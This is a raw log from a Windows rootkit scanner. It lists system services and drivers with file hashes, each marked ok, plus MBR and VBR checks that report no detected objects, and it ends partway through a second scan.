18:04:18.0558 5696 SDRSVC - ok
18:04:18.0573 5696 [ 90A3935D05B494A5A39D37E71F09A677 ] secdrv C:\Windows\system32\drivers\secdrv.sys
18:04:18.0651 5696 secdrv - ok
18:04:18.0683 5696 [ FD5199D4D8A521005E4B5EE7FE00FA9B ] seclogon C:\Windows\system32\seclogon.dll
18:04:18.0714 5696 seclogon - ok
18:04:18.0729 5696 [ A9BBAB5759771E523F55563D6CBE140F ] SENS C:\Windows\System32\sens.dll
18:04:18.0776 5696 SENS - ok
18:04:18.0807 5696 [ 68E44E331D46F0FB38F0863A84CD1A31 ] Serenum C:\Windows\system32\drivers\serenum.sys
18:04:18.0885 5696 Serenum - ok
18:04:18.0917 5696 [ C70D69A918B178D3C3B06339B40C2E1B ] Serial C:\Windows\system32\drivers\serial.sys
18:04:18.0982 5696 Serial - ok
18:04:19.0012 5696 [ 8AF3D28A879BF75DB53A0EE7A4289624 ] sermouse C:\Windows\system32\drivers\sermouse.sys
18:04:19.0052 5696 sermouse - ok
18:04:19.0072 5696 [ D2193326F729B163125610DBF3E17D57 ] SessionEnv C:\Windows\system32\sessenv.dll
18:04:19.0122 5696 SessionEnv - ok
18:04:19.0162 5696 [ 103B79418DA647736EE95645F305F68A ] sffdisk C:\Windows\system32\drivers\sffdisk.sys
18:04:19.0222 5696 sffdisk - ok
18:04:19.0252 5696 [ 8FD08A310645FE872EEEC6E08C6BF3EE ] sffp_mmc C:\Windows\system32\drivers\sffp_mmc.sys
18:04:19.0322 5696 sffp_mmc - ok
18:04:29.0350 5696 ================ Scan global ===============================
18:04:29.0380 5696 [ F31EEBC1A1C81FD04005489CC3DCDFE7 ] C:\Windows\system32\basesrv.dll
18:04:29.0410 5696 [ D2293B069E4B63DC17B2F08D45E71124 ] C:\Windows\system32\winsrv.dll
18:04:29.0440 5696 [ D2293B069E4B63DC17B2F08D45E71124 ] C:\Windows\system32\winsrv.dll
18:04:29.0470 5696 [ D4E6D91C1349B7BFB3599A6ADA56851B ] C:\Windows\system32\services.exe
18:04:29.0480 5696 [Global] - ok
18:04:29.0480 5696 ================ Scan MBR ==================================
18:04:29.0500 5696 [ 5C616939100B85E558DA92B899A0FC36 ] \Device\Harddisk0\DR0
18:04:30.0110 5696 \Device\Harddisk0\DR0 - ok
18:04:30.0400 5696 [ 5FB38429D5D77768867C76DCBDB35194 ] \Device\Harddisk1\DR1
18:04:30.0720 5696 \Device\Harddisk1\DR1 - ok
18:04:30.0730 5696 [ 8F558EB6672622401DA993E1E865C861 ] \Device\Harddisk2\DR2
18:04:30.0886 5696 \Device\Harddisk2\DR2 - ok
18:04:30.0886 5696 ================ Scan VBR ==================================
18:04:30.0890 5696 [ 961EA6BC3F5CD34DA67B2EEE8AA84D1B ] \Device\Harddisk0\DR0\Partition1
18:04:30.0893 5696 \Device\Harddisk0\DR0\Partition1 - ok
18:04:30.0919 5696 [ 758AD88425527B05E4FA98631C162C08 ] \Device\Harddisk0\DR0\Partition2
18:04:30.0920 5696 \Device\Harddisk0\DR0\Partition2 - ok
18:04:30.0933 5696 [ EFF1ECE495ECBDEA78E34410A05FC2D3 ] \Device\Harddisk0\DR0\Partition3
18:04:30.0935 5696 \Device\Harddisk0\DR0\Partition3 - ok
18:04:30.0939 5696 [ D894F5CF2FC97000C4CD292863AEACC0 ] \Device\Harddisk1\DR1\Partition1
18:04:30.0940 5696 \Device\Harddisk1\DR1\Partition1 - ok
18:04:30.0945 5696 [ B40BC0A08101F64916E605AE52C91653 ] \Device\Harddisk2\DR2\Partition1
18:04:30.0948 5696 \Device\Harddisk2\DR2\Partition1 - ok
18:04:30.0949 5696 ============================================================
18:04:30.0949 5696 Scan finished
18:04:30.0949 5696 ============================================================
18:04:30.0962 5680 Detected object count: 0
18:04:30.0962 5680 Actual detected object count: 0
18:04:48.0866 5600 ============================================================
18:04:48.0866 5600 Scan started
18:04:48.0866 5600 Mode: Manual; SigCheck; TDLFS;
18:04:48.0866 5600 ============================================================
18:04:49.0475 5600 ================ Scan system memory ========================
18:04:49.0475 5600 System memory - ok
18:04:49.0475 5600 ================ Scan services =============================
18:04:57.0325 5600 KSecDD - ok
18:04:57.0358 5600 [ 8078F8F8F7A79E2E6B494523A828C585 ] KtmRm C:\Windows\system32\msdtckrm.dll
18:04:57.0397 5600 KtmRm - ok
18:04:57.0424 5600 [ 1BF5EEBFD518DD7298434D8C862F825D ] LanmanServer C:\Windows\system32\srvsvc.dll
18:04:57.0443 5600 LanmanServer - ok
18:04:57.0482 5600 [ 1DB69705B695B987082C8BAEC0C6B34F ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
18:04:57.0511 5600 LanmanWorkstation - ok
18:04:57.0534 5600 [ D1C5883087A0C3F1344D9D55A44901F6 ] lltdio C:\Windows\system32\DRIVERS\lltdio.sys
18:04:57.0561 5600 lltdio - ok
18:04:57.0588 5600 [ 2D5A428872F1442631D0959A34ABFF63 ] lltdsvc C:\Windows\System32\lltdsvc.dll
18:04:57.0617 5600 lltdsvc - ok
18:04:57.0660 5600 [ 35D40113E4A5B961B6CE5C5857702518 ] lmhosts C:\Windows\System32\lmhsvc.dll
18:04:57.0706 5600 lmhosts - ok
18:04:57.0740 5600 [ A2262FB9F28935E862B4DB46438C80D2 ] LSI_FC C:\Windows\system32\drivers\lsi_fc.sys
18:04:57.0755 5600 LSI_FC - ok
18:04:57.0763 5600 [ 30D73327D390F72A62F32C103DAF1D6D ] LSI_SAS C:\Windows\system32\drivers\lsi_sas.sys
18:04:57.0776 5600 LSI_SAS - ok
18:04:57.0790 5600 [ E1E36FEFD45849A95F1AB81DE0159FE3 ] LSI_SCSI C:\Windows\system32\drivers\lsi_scsi.sys
18:04:57.0802 5600 LSI_SCSI - ok
18:04:57.0839 5600 [ 23B55D27A0AFB7FE9CBCB20B617CC168 ] Ltn_stk7070P C:\Windows\system32\DRIVERS\Ltn_stk7070P.sys
18:04:57.0886 5600 Ltn_stk7070P - ok
18:04:57.0908 5600 [ 1FA7503D019291C027FEDAE509BC5500 ] Ltn_stkrc C:\Windows\system32\DRIVERS\Ltn_stkrc.sys
18:04:57.0932 5600 Ltn_stkrc - ok
18:04:57.0957 5600 [ 8F5C7426567798E62A3B3614965D62CC ] luafv C:\Windows\system32\drivers\luafv.sys
18:04:57.0984 5600 luafv - ok
18:04:58.0011 5600 [ D153B14FC6598EAE8422A2037553ADCE ] megasas C:\Windows\system32\drivers\megasas.sys
18:04:58.0023 5600 megasas - ok
18:04:58.0041 5600 [ 1076FFCFFAAE8385FD62DFCB25AC4708 ] MMCSS C:\Windows\system32\mmcss.dll
18:04:58.0071 5600 MMCSS - ok
18:04:58.0097 5600 [ E13B5EA0F51BA5B1512EC671393D09BA ] Modem C:\Windows\system32\drivers\modem.sys
18:04:58.0125 5600 Modem - ok
18:04:58.0142 5600 [ 0A9BB33B56E294F686ABB7C1E4E2D8A8 ] monitor C:\Windows\system32\DRIVERS\monitor.sys
18:04:58.0172 5600 monitor - ok
18:04:58.0214 5600 [ 5BF6A1326A335C5298477754A506D263 ] mouclass C:\Windows\system32\DRIVERS\mouclass.sys
18:04:58.0227 5600 mouclass - ok
18:04:58.0245 5600 [ 93B8D4869E12CFBE663915502900876F ] mouhid C:\Windows\system32\DRIVERS\mouhid.sys
18:04:58.0273 5600 mouhid - ok
18:04:58.0293 5600 [ BDAFC88AA6B92F7842416EA6A48E1600 ] MountMgr C:\Windows\system32\drivers\mountmgr.sys
18:04:58.0308 5600 MountMgr - ok
18:04:58.0335 5600 [ 51A84B690DF519DCF656F780243D953E ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
18:04:58.0348 5600 MozillaMaintenance - ok
18:04:58.0389 5600 [ 583A41F26278D9E0EA548163D6139397 ] mpio C:\Windows\system32\drivers\mpio.sys
18:04:58.0402 5600 mpio - ok
18:04:58.0445 5600 [ 22241FEBA9B2DEFA669C8CB0A8DD7D2E ] mpsdrv C:\Windows\system32\drivers\mpsdrv.sys
18:04:58.0469 5600 mpsdrv - ok
18:04:58.0505 5600 [ 5DE62C6E9108F14F6794060A9BDECAEC ] MpsSvc C:\Windows\system32\mpssvc.dll
18:04:58.0541 5600 MpsSvc - ok
18:04:58.0567 5600 [ 4FBBB70D30FD20EC51F80061703B001E ] Mraid35x C:\Windows\system32\drivers\mraid35x.sys
18:04:58.0579 5600 Mraid35x - ok
18:04:58.0603 5600 [ 82CEA0395524AACFEB58BA1448E8325C ] MRxDAV C:\Windows\system32\drivers\mrxdav.sys
18:04:58.0619 5600 MRxDAV - ok
18:04:58.0649 5600 [ 1E94971C4B446AB2290DEB71D01CF0C2 ] mrxsmb C:\Windows\system32\DRIVERS\mrxsmb.sys
18:04:58.0680 5600 mrxsmb - ok
18:04:58.0705 5600 [ 4FCCB34D793B116423209C0F8B7A3B03 ] mrxsmb10 C:\Windows\system32\DRIVERS\mrxsmb10.sys
18:04:58.0721 5600 mrxsmb10 - ok
18:04:58.0729 5600 [ C3CB1B40AD4A0124D617A1199B0B9D7C ] mrxsmb20 C:\Windows\system32\DRIVERS\mrxsmb20.sys
18:04:58.0743 5600 mrxsmb20 - ok
18:04:58.0772 5600 [ 5457DCFA7C0DA43522F4D9D4049C1472 ] msahci C:\Windows\system32\drivers\msahci.sys
18:04:58.0805 5600 msahci - ok
18:04:58.0821 5600 [ 3FC82A2AE4CC149165A94699183D3028 ] msdsm C:\Windows\system32\drivers\msdsm.sys
18:04:58.0837 5600 msdsm - ok
18:04:58.0852 5600 [ FD7520CC3A80C5FC8C48852BB24C6DED ] MSDTC C:\Windows\System32\msdtc.exe
18:04:58.0883 5600 MSDTC - ok
18:04:58.0915 5600 [ A9927F4A46B816C92F461ACB90CF8515 ] Msfs C:\Windows\system32\drivers\Msfs.sys
18:04:58.0946 5600 Msfs - ok
18:04:58.0961 5600 [ 0F400E306F385C56317357D6DEA56F62 ] msisadrv C:\Windows\system32\drivers\msisadrv.sys
18:04:58.0977 5600 msisadrv - ok
18:04:59.0008 5600 [ 85466C0757A23D9A9AECDC0755203CB2 ] MSiSCSI C:\Windows\system32\iscsiexe.dll
18:04:59.0039 5600 MSiSCSI - ok
18:04:59.0039 5600 msiserver - ok
18:04:59.0071 5600 [ D8C63D34D9C9E56C059E24EC7185CC07 ] MSKSSRV C:\Windows\system32\drivers\MSKSSRV.sys
18:04:59.0102 5600 MSKSSRV - ok
18:04:59.0117 5600 [ 1D373C90D62DDB641D50E55B9E78D65E ] MSPCLOCK C:\Windows\system32\drivers\MSPCLOCK.sys
18:04:59.0149 5600 MSPCLOCK - ok
18:04:59.0164 5600 [ B572DA05BF4E098D4BBA3A4734FB505B ] MSPQM C:\Windows\system32\drivers\MSPQM.sys
18:04:59.0195 5600 MSPQM - ok
18:04:59.0227 5600 [ B49456D70555DE905C311BCDA6EC6ADB ] MsRPC C:\Windows\system32\drivers\MsRPC.sys
18:04:59.0242 5600 MsRPC - ok
18:04:59.0258 5600 [ E384487CB84BE41D09711C30CA79646C ] mssmbios C:\Windows\system32\DRIVERS\mssmbios.sys
18:04:59.0273 5600 mssmbios - ok
18:04:59.0273 5600 [ 7199C1EEC1E4993CAF96B8C0A26BD58A ] MSTEE C:\Windows\system32\drivers\MSTEE.sys
18:04:59.0305 5600 MSTEE - ok
18:04:59.0320 5600 [ 6A57B5733D4CB702C8EA4542E836B96C ] Mup C:\Windows\system32\Drivers\mup.sys
18:04:59.0336 5600 Mup - ok
18:04:59.0367 5600 [ E4EAF0C5C1B41B5C83386CF212CA9584 ] napagent C:\Windows\system32\qagentRT.dll
18:04:59.0398 5600 napagent - ok
18:04:59.0445 5600 [ 85C44FDFF9CF7E72A40DCB7EC06A4416 ] NativeWifiP C:\Windows\system32\DRIVERS\nwifi.sys
18:04:59.0461 5600 NativeWifiP - ok
18:04:59.0492 5600 [ 1357274D1883F68300AEADD15D7BBB42 ] NDIS C:\Windows\system32\drivers\ndis.sys
18:04:59.0523 5600 NDIS - ok
18:04:59.0554 5600 [ 0E186E90404980569FB449BA7519AE61 ] NdisTapi C:\Windows\system32\DRIVERS\ndistapi.sys
18:04:59.0570 5600 NdisTapi - ok
18:04:59.0601 5600 [ D6973AA34C4D5D76C0430B181C3CD389 ] Ndisuio C:\Windows\system32\DRIVERS\ndisuio.sys
18:04:59.0617 5600 Ndisuio - ok
18:04:59.0632 5600 [ 818F648618AE34F729FDB47EC68345C3 ] NdisWan C:\Windows\system32\DRIVERS\ndiswan.sys
18:04:59.0663 5600 NdisWan - ok
18:04:59.0695 5600 [ 71DAB552B41936358F3B541AE5997FB3 ] NDProxy C:\Windows\system32\drivers\NDProxy.sys
18:04:59.0710 5600 NDProxy - ok
18:04:59.0726 5600 [ BCD093A5A6777CF626434568DC7DBA78 ] NetBIOS C:\Windows\system32\DRIVERS\netbios.sys
18:04:59.0741 5600 NetBIOS - ok
18:04:59.0773 5600 [ ECD64230A59CBD93C85F1CD1CAB9F3F6 ] netbt C:\Windows\system32\DRIVERS\netbt.sys
18:04:59.0788 5600 netbt - ok
18:04:59.0819 5600 [ A3E186B4B935905B829219502557314E ] Netlogon C:\Windows\system32\lsass.exe
18:04:59.0835 5600 Netlogon - ok
18:04:59.0866 5600 [ C8052711DAECC48B982434C5116CA401 ] Netman C:\Windows\System32\netman.dll
18:04:59.0897 5600 Netman - ok
18:04:59.0913 5600 [ 2EF3BBE22E5A5ACD1428EE387A0D0172 ] netprofm C:\Windows\System32\netprofm.dll
18:04:59.0943 5600 netprofm - ok
18:04:59.0983 5600 [ D6C4E4A39A36029AC0813D476FBD0248 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
18:04:59.0993 5600 NetTcpPortSharing - ok
18:05:00.0123 5600 [ 8DE67BD902095A13329FD82C85A1FA09 ] NETw5v32 C:\Windows\system32\DRIVERS\NETw5v32.sys
18:05:00.0263 5600 NETw5v32 - ok
18:05:00.0293 5600 [ 2E7FB731D4790A1BC6270ACCEFACB36E ] nfrd960 C:\Windows\system32\drivers\nfrd960.sys
18:05:00.0303 5600 nfrd960 - ok
18:05:00.0323 5600 [ 2997B15415F9BBE05B5A4C1C85E0C6A2 ] NlaSvc C:\Windows\System32\nlasvc.dll
18:05:00.0363 5600 NlaSvc - ok
18:05:00.0393 5600 [ D36F239D7CCE1931598E8FB90A0DBC26 ] Npfs C:\Windows\system32\drivers\Npfs.sys
18:05:00.0413 5600 Npfs - ok
18:05:00.0433 5600 [ 8BB86F0C7EEA2BDED6FE095D0B4CA9BD ] nsi C:\Windows\system32\nsisvc.dll
18:05:00.0463 5600 nsi - ok
18:05:00.0483 5600 [ 609773E344A97410CE4EBF74A8914FCF ] nsiproxy C:\Windows\system32\drivers\nsiproxy.sys
18:05:00.0503 5600 nsiproxy - ok
18:05:00.0553 5600 [ 6A4A98CEE84CF9E99564510DDA4BAA47 ] Ntfs C:\Windows\system32\drivers\Ntfs.sys
18:05:00.0593 5600 Ntfs - ok
18:05:00.0613 5600 [ E875C093AEC0C978A90F30C9E0DFBB72 ] ntrigdigi C:\Windows\system32\drivers\ntrigdigi.sys
18:05:00.0663 5600 ntrigdigi - ok
18:05:00.0713 5600 [ C5DBBCDA07D780BDA9B685DF333BB41E ] Null C:\Windows\system32\drivers\Null.sys
18:05:00.0743 5600 Null - ok
18:05:00.0763 5600 [ E69E946F80C1C31C53003BFBF50CBB7C ] nvraid C:\Windows\system32\drivers\nvraid.sys
18:05:00.0773 5600 nvraid - ok
18:05:00.0803 5600 [ 9E0BA19A28C498A6D323D065DB76DFFC ] nvstor C:\Windows\system32\drivers\nvstor.sys
18:05:00.0813 5600 nvstor - ok
18:05:00.0843 5600 [ 07C186427EB8FCC3D8D7927187F260F7 ] nv_agp C:\Windows\system32\drivers\nv_agp.sys
18:05:00.0853 5600 nv_agp - ok
18:05:00.0863 5600 NwlnkFlt - ok
18:05:00.0873 5600 NwlnkFwd - ok
18:05:00.0893 5600 [ BE32DA025A0BE1878F0EE8D6D9386CD5 ] ohci1394 C:\Windows\system32\drivers\ohci1394.sys
18:05:00.0933 5600 ohci1394 - ok
18:05:00.0973 5600 [ 0C8E8E61AD1EB0B250B846712C917506 ] p2pimsvc C:\Windows\system32\p2psvc.dll
18:05:01.0023 5600 p2pimsvc - ok
18:05:01.0033 5600 [ 0C8E8E61AD1EB0B250B846712C917506 ] p2psvc C:\Windows\system32\p2psvc.dll
18:05:01.0062 5600 p2psvc - ok
18:05:01.0118 5600 [ 0FA9B5055484649D63C303FE404E5F4D ] Parport C:\Windows\system32\drivers\parport.sys
18:05:01.0162 5600 Parport - ok
18:05:01.0219 5600 [ B9C2B89F08670E159F7181891E449CD9 ] partmgr C:\Windows\system32\drivers\partmgr.sys
18:05:01.0235 5600 partmgr - ok
18:05:01.0275 5600 [ 4F9A6A8A31413180D0FCB279AD5D8112 ] Parvdm C:\Windows\system32\drivers\parvdm.sys
18:05:01.0321 5600 Parvdm - ok
18:05:01.0348 5600 [ C6276AD11F4BB49B58AA1ED88537F14A ] PcaSvc C:\Windows\System32\pcasvc.dll
18:05:01.0364 5600 PcaSvc - ok
18:05:01.0391 5600 [ 941DC1D19E7E8620F40BBC206981EFDB ] pci C:\Windows\system32\drivers\pci.sys
18:05:01.0407 5600 pci - ok
18:05:01.0438 5600 [ 3B1901E401473E03EB8C874271E50C26 ] pciide C:\Windows\system32\drivers\pciide.sys
18:05:01.0450 5600 pciide - ok
18:05:01.0474 5600 [ E6F3FB1B86AA519E7698AD05E58B04E5 ] pcmcia C:\Windows\system32\drivers\pcmcia.sys
18:05:01.0489 5600 pcmcia - ok
18:05:01.0526 5600 [ 6349F6ED9C623B44B52EA3C63C831A92 ] PEAUTH C:\Windows\system32\drivers\peauth.sys
18:05:01.0593 5600 PEAUTH - ok
18:05:01.0670 5600 [ B1689DF169143F57053F795390C99DB3 ] pla C:\Windows\system32\pla.dll
18:05:01.0780 5600 pla - ok
18:05:01.0806 5600 [ C5E7F8A996EC0A82D508FD9064A5569E ] PlugPlay C:\Windows\system32\umpnpmgr.dll
18:05:01.0836 5600 PlugPlay - ok
18:05:01.0863 5600 [ 0C8E8E61AD1EB0B250B846712C917506 ] PNRPAutoReg C:\Windows\system32\p2psvc.dll
18:05:01.0891 5600 PNRPAutoReg - ok
18:05:01.0908 5600 [ 0C8E8E61AD1EB0B250B846712C917506 ] PNRPsvc C:\Windows\system32\p2psvc.dll
18:05:01.0936 5600 PNRPsvc - ok
18:05:01.0980 5600 [ D0494460421A03CD5225CCA0059AA146 ] PolicyAgent C:\Windows\System32\ipsecsvc.dll
18:05:02.0014 5600 PolicyAgent - ok
18:05:02.0040 5600 [ ECFFFAEC0C1ECD8DBC77F39070EA1DB1 ] PptpMiniport C:\Windows\system32\DRIVERS\raspptp.sys
18:05:02.0068 5600 PptpMiniport - ok
18:05:02.0091 5600 [ 0E3CEF5D28B40CF273281D620C50700A ] Processor C:\Windows\system32\drivers\processr.sys
18:05:02.0136 5600 Processor - ok
18:05:02.0164 5600 [ 0508FAA222D28835310B7BFCA7A77346 ] ProfSvc C:\Windows\system32\profsvc.dll
18:05:02.0195 5600 ProfSvc - ok
18:05:02.0213 5600 [ A3E186B4B935905B829219502557314E ] ProtectedStorage C:\Windows\system32\lsass.exe
18:05:02.0228 5600 ProtectedStorage - ok
18:05:02.0253 5600 [ 99514FAA8DF93D34B5589187DB3AA0BA ] PSched C:\Windows\system32\DRIVERS\pacer.sys
18:05:02.0275 5600 PSched - ok
18:05:02.0321 5600 [ CCDAC889326317792480C0A67156A1EC ] ql2300 C:\Windows\system32\drivers\ql2300.sys
18:05:02.0356 5600 ql2300 - ok
18:05:02.0367 5600 [ 81A7E5C076E59995D54BC1ED3A16E60B ] ql40xx C:\Windows\system32\drivers\ql40xx.sys
18:05:02.0381 5600 ql40xx - ok
18:05:02.0402 5600 [ E9ECAE663F47E6CB43962D18AB18890F ] QWAVE C:\Windows\system32\qwave.dll
18:05:02.0423 5600 QWAVE - ok
18:05:02.0456 5600 [ 9F5E0E1926014D17486901C88ECA2DB7 ] QWAVEdrv C:\Windows\system32\drivers\qwavedrv.sys
18:05:02.0471 5600 QWAVEdrv - ok
18:05:02.0496 5600 [ 147D7F9C556D259924351FEB0DE606C3 ] RasAcd C:\Windows\system32\DRIVERS\rasacd.sys
18:05:02.0523 5600 RasAcd - ok
18:05:02.0553 5600 [ F6A452EB4CEADBB51C9E0EE6B3ECEF0F ] RasAuto C:\Windows\System32\rasauto.dll
18:05:02.0583 5600 RasAuto - ok
18:05:02.0601 5600 [ A214ADBAF4CB47DD2728859EF31F26B0 ] Rasl2tp C:\Windows\system32\DRIVERS\rasl2tp.sys
18:05:02.0629 5600 Rasl2tp - ok
18:05:02.0660 5600 [ 75D47445D70CA6F9F894B032FBC64FCF ] RasMan C:\Windows\System32\rasmans.dll
18:05:02.0688 5600 RasMan - ok
18:05:02.0725 5600 [ 509A98DD18AF4375E1FC40BC175F1DEF ] RasPppoe C:\Windows\system32\DRIVERS\raspppoe.sys
18:05:02.0745 5600 RasPppoe - ok
18:05:02.0758 5600 [ 2005F4A1E05FA09389AC85840F0A9E4D ] RasSstp C:\Windows\system32\DRIVERS\rassstp.sys
18:05:02.0787 5600 RasSstp - ok
18:05:02.0826 5600 [ B14C9D5B9ADD2F84F70570BBBFAA7935 ] rdbss C:\Windows\system32\DRIVERS\rdbss.sys
18:05:02.0853 5600 rdbss - ok
18:05:02.0872 5600 [ 89E59BE9A564262A3FB6C4F4F1CD9899 ] RDPCDD C:\Windows\system32\DRIVERS\RDPCDD.sys
18:05:02.0900 5600 RDPCDD - ok
18:05:02.0930 5600 [ E8BD98D46F2ED77132BA927FCCB47D8B ] rdpdr C:\Windows\system32\drivers\rdpdr.sys
18:05:02.0979 5600 rdpdr - ok
18:05:02.0987 5600 [ 9D91FE5286F748862ECFFA05F8A0710C ] RDPENCDD C:\Windows\system32\drivers\rdpencdd.sys
18:05:03.0014 5600 RDPENCDD - ok
18:05:03.0047 5600 [ C127EBD5AFAB31524662C48DFCEB773A ] RDPWD C:\Windows\system32\drivers\RDPWD.sys
18:05:03.0070 5600 RDPWD - ok
18:05:03.0097 5600 [ BCDD6B4804D06B1F7EBF29E53A57ECE9 ] RemoteAccess C:\Windows\System32\mprdim.dll
18:05:03.0151 5600 RemoteAccess - ok
18:05:03.0182 5600 [ 9E6894EA18DAFF37B63E1005F83AE4AB ] RemoteRegistry C:\Windows\system32\regsvc.dll
18:05:03.0198 5600 RemoteRegistry - ok
18:05:03.0229 5600 [ 6482707F9F4DA0ECBAB43B2E0398A101 ] RFCOMM C:\Windows\system32\DRIVERS\rfcomm.sys
18:05:03.0260 5600 RFCOMM - ok
18:05:03.0276 5600 [ 5123F83CBC4349D065534EEB6BBDC42B ] RpcLocator C:\Windows\system32\locator.exe
18:05:03.0291 5600 RpcLocator - ok
18:05:03.0322 5600 [ 3B5B4D53FEC14F7476CA29A20CC31AC9 ] RpcSs C:\Windows\system32\rpcss.dll
18:05:03.0369 5600 RpcSs - ok
18:05:03.0400 5600 [ 9C508F4074A39E8B4B31D27198146FAD ] rspndr C:\Windows\system32\DRIVERS\rspndr.sys
18:05:03.0416 5600 rspndr - ok
18:05:03.0432 5600 [ A3E186B4B935905B829219502557314E ] SamSs C:\Windows\system32\lsass.exe
18:05:03.0447 5600 SamSs - ok
18:05:03.0473 5600 [ 3CE8F073A557E172B330109436984E30 ] sbp2port C:\Windows\system32\drivers\sbp2port.sys
18:05:03.0493 5600 sbp2port - ok
18:05:03.0513 5600 [ 77B7A11A0C3D78D3386398FBBEA1B632 ] SCardSvr C:\Windows\System32\SCardSvr.dll
18:05:03.0543 5600 SCardSvr - ok
18:05:03.0573 5600 [ 1A58069DB21D05EB2AB58EE5753EBE8D ] Schedule C:\Windows\system32\schedsvc.dll
18:05:03.0633 5600 Schedule - ok
18:05:03.0653 5600 [ 312EC3E37A0A1F2006534913E37B4423 ] SCPolicySvc C:\Windows\System32\certprop.dll
18:05:03.0683 5600 SCPolicySvc - ok
18:05:03.0703 5600 [ 716313D9F6B0529D03F726D5AAF6F191 ] SDRSVC C:\Windows\System32\SDRSVC.dll
18:05:03.0733 5600 SDRSVC - ok
18:05:03.0763 5600 [ 90A3935D05B494A5A39D37E71F09A677 ] secdrv C:\Windows\system32\drivers\secdrv.sys
18:05:03.0803 5600 secdrv - ok
18:05:03.0823 5600 [ FD5199D4D8A521005E4B5EE7FE00FA9B ] seclogon C:\Windows\system32\seclogon.dll
18:05:03.0853 5600 seclogon - ok
18:05:03.0863 5600 [ A9BBAB5759771E523F55563D6CBE140F ] SENS C:\Windows\System32\sens.dll
18:05:03.0893 5600 SENS - ok
18:05:03.0913 5600 [ 68E44E331D46F0FB38F0863A84CD1A31 ] Serenum C:\Windows\system32\drivers\serenum.sys
18:05:03.0953 5600 Serenum - ok
18:05:03.0973 5600 [ C70D69A918B178D3C3B06339B40C2E1B ] Serial C:\Windows\system32\drivers\serial.sys
18:05:04.0023 5600 Serial - ok
18:05:04.0053 5600 [ 8AF3D28A879BF75DB53A0EE7A4289624 ] sermouse C:\Windows\system32\drivers\sermouse.sys
18:05:04.0073 5600 sermouse - ok
18:05:04.0103 5600 [ D2193326F729B163125610DBF3E17D57 ] SessionEnv C:\Windows\system32\sessenv.dll
18:05:04.0133 5600 SessionEnv - ok
18:05:04.0153 5600 [ 103B79418DA647736EE95645F305F68A ] sffdisk C:\Windows\system32\drivers\sffdisk.sys
18:05:04.0193 5600 sffdisk - ok
18:05:04.0213 5600 [ 8FD08A310645FE872EEEC6E08C6BF3EE ] sffp_mmc C:\Windows\system32\drivers\sffp_mmc.sys
18:05:04.0263 5600 sffp_mmc - ok
18:05:04.0293 5600 [ 9CFA05FCFCB7124E69CFC812B72F9614 ] sffp_sd C:\Windows\system32\drivers\sffp_sd.sys
18:05:04.0343 5600 sffp_sd - ok
18:05:04.0353 5600 [ 46ED8E91793B2E6F848015445A0AC188 ] sfloppy C:\Windows\system32\drivers\sfloppy.sys
18:05:04.0393 5600 sfloppy - ok
18:05:04.0413 5600 [ E1499BD0FF76B1B2FBBF1AF339D91165 ] SharedAccess C:\Windows\System32\ipnathlp.dll
18:05:04.0443 5600 SharedAccess - ok
18:05:04.0473 5600 [ C7230FBEE14437716701C15BE02C27B8 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
18:05:04.0513 5600 ShellHWDetection - ok
18:05:04.0543 5600 [ D2A595D6EEBEEAF4334F8E50EFBC9931 ] sisagp C:\Windows\system32\drivers\sisagp.sys
18:05:04.0553 5600 sisagp - ok
18:05:04.0563 5600 [ CEDD6F4E7D84E9F98B34B3FE988373AA ] SiSRaid2 C:\Windows\system32\drivers\sisraid2.sys
18:05:04.0573 5600 SiSRaid2 - ok
18:05:04.0593 5600 [ DF843C528C4F69D12CE41CE462E973A7 ] SiSRaid4 C:\Windows\system32\drivers\sisraid4.sys
18:05:04.0603 5600 SiSRaid4 - ok
18:05:04.0713 5600 [ 862BB4CBC05D80C5B45BE430E5EF872F ] slsvc C:\Windows\system32\SLsvc.exe
18:05:05.0003 5600 slsvc - ok
18:05:05.0033 5600 [ 6EDC422215CD78AA8A9CDE6B30ABBD35 ] SLUINotify C:\Windows\system32\SLUINotify.dll
18:05:05.0053 5600 SLUINotify - ok
18:05:05.0083 5600 [ 7B75299A4D201D6A6533603D6914AB04 ] Smb C:\Windows\system32\DRIVERS\smb.sys
18:05:05.0113 5600 Smb - ok
18:05:05.0153 5600 [ 2A146A055B4401C16EE62D18B8E2A032 ] SNMPTRAP C:\Windows\System32\snmptrap.exe
18:05:05.0173 5600 SNMPTRAP - ok
18:05:05.0243 5600 [ 50660E6B082A7BF86751A003C3BB5210 ] SNP2UVC C:\Windows\system32\DRIVERS\snp2uvc.sys
18:05:05.0333 5600 SNP2UVC - ok
18:05:05.0363 5600 [ 7AEBDEEF071FE28B0EEF2CDD69102BFF ] spldr C:\Windows\system32\drivers\spldr.sys
18:05:05.0383 5600 spldr - ok
18:05:05.0403 5600 [ 8554097E5136C3BF9F69FE578A1B35F4 ] Spooler C:\Windows\System32\spoolsv.exe
18:05:05.0443 5600 Spooler - ok
18:05:05.0473 5600 [ 41987F9FC0E61ADF54F581E15029AD91 ] srv C:\Windows\system32\DRIVERS\srv.sys
18:05:05.0503 5600 srv - ok
18:05:05.0523 5600 [ FF33AFF99564B1AA534F58868CBE41EF ] srv2 C:\Windows\system32\DRIVERS\srv2.sys
18:05:05.0553 5600 srv2 - ok
18:05:05.0563 5600 [ 7605C0E1D01A08F3ECD743F38B834A44 ] srvnet C:\Windows\system32\DRIVERS\srvnet.sys
18:05:05.0583 5600 srvnet - ok
18:05:05.0613 5600 [ 03D50B37234967433A5EA5BA72BC0B62 ] SSDPSRV C:\Windows\System32\ssdpsrv.dll
18:05:05.0643 5600 SSDPSRV - ok
18:05:05.0673 5600 [ A36EE93698802CD899F98BFD553D8185 ] ssmdrv C:\Windows\system32\DRIVERS\ssmdrv.sys
18:05:05.0683 5600 ssmdrv - ok
18:05:05.0703 5600 [ 6F1A32E7B7B30F004D9A20AFADB14944 ] SstpSvc C:\Windows\system32\sstpsvc.dll
18:05:05.0723 5600 SstpSvc - ok
18:05:05.0763 5600 [ 5DE7D67E49B88F5F07F3E53C4B92A352 ] stisvc C:\Windows\System32\wiaservc.dll
18:05:05.0823 5600 stisvc - ok
18:05:05.0853 5600 [ 7BA58ECF0C0A9A69D44B3DCA62BECF56 ] swenum C:\Windows\system32\DRIVERS\swenum.sys
18:05:05.0863 5600 swenum - ok
18:05:05.0903 5600 [ F21FD248040681CCA1FB6C9A03AAA93D ] swprv C:\Windows\System32\swprv.dll
